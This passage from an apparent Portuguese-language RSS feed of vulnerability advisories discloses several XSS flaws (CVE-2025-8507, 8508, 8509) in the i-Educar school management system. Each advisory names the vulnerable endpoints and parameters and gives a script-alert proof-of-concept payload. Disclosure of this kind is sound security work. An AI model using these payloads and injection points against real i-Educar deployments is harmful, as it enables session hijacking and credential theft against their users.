	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;229&amp;#34;
		data-flex-basis=&amp;#34;550px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8545.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8545.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8507</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8507/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8507/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8507-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-intraneteducar_funcao_lstphp&amp;#34;&amp;gt;CVE-2025-8507: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;/intranet/educar_funcao_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8507&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8507&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint &amp;lt;code&amp;gt;/intranet/educar_funcao_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nm_funcao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_funcao_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;nm_funcao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;nm_funcao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8507-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-intraneteducar_funcao_lstphp&amp;#34;&amp;gt;CVE-2025-8507: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;/intranet/educar_funcao_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8507&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8507&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint &amp;lt;code&amp;gt;/intranet/educar_funcao_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nm_funcao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_funcao_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;nm_funcao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;nm_funcao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8507/image.png&amp;#34;
	width=&amp;#34;963&amp;#34;
	height=&amp;#34;838&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8507/image_hu_c32e7fef2db934c5.png 480w, /p/cve-2025-8507/image_hu_bf469db527e5022b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;114&amp;#34;
		data-flex-basis=&amp;#34;275px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O mesmo problema acontece com o parâmetro &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8507.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8507.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 03 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8508</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8508/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8508/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8508-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-intraneteducar_avaliacao_desempenho_cadphp&amp;#34;&amp;gt;CVE-2025-8508: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/intranet/educar_avaliacao_desempenho_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8508&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8508&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/intranet/educar_avaliacao_desempenho_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_avaliacao_desempenho_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8508-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-intraneteducar_avaliacao_desempenho_cadphp&amp;#34;&amp;gt;CVE-2025-8508: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/intranet/educar_avaliacao_desempenho_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8508&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8508&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/intranet/educar_avaliacao_desempenho_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_avaliacao_desempenho_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS51&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8508/image.png&amp;#34;
	width=&amp;#34;737&amp;#34;
	height=&amp;#34;887&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8508/image_hu_2db57f13ab8e6adc.png 480w, /p/cve-2025-8508/image_hu_60c2e044653244a7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;83&amp;#34;
		data-flex-basis=&amp;#34;199px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O payload foi enviado por meio dos campos &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; e armazenado com sucesso. Quando a página que exibe esses valores é acessada, o script é executado no contexto da sessão do navegador do usuário, confirmando a presença de uma vulnerabilidade XSS armazenada.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8508.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8508.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 03 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8509</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8509/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8509/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8509-cross-site-scripting-xss-armazenado-no-endpoint-intraneteducar_servidor_cadphp-parâmetro-matricula&amp;#34;&amp;gt;CVE-2025-8509: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/intranet/educar_servidor_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
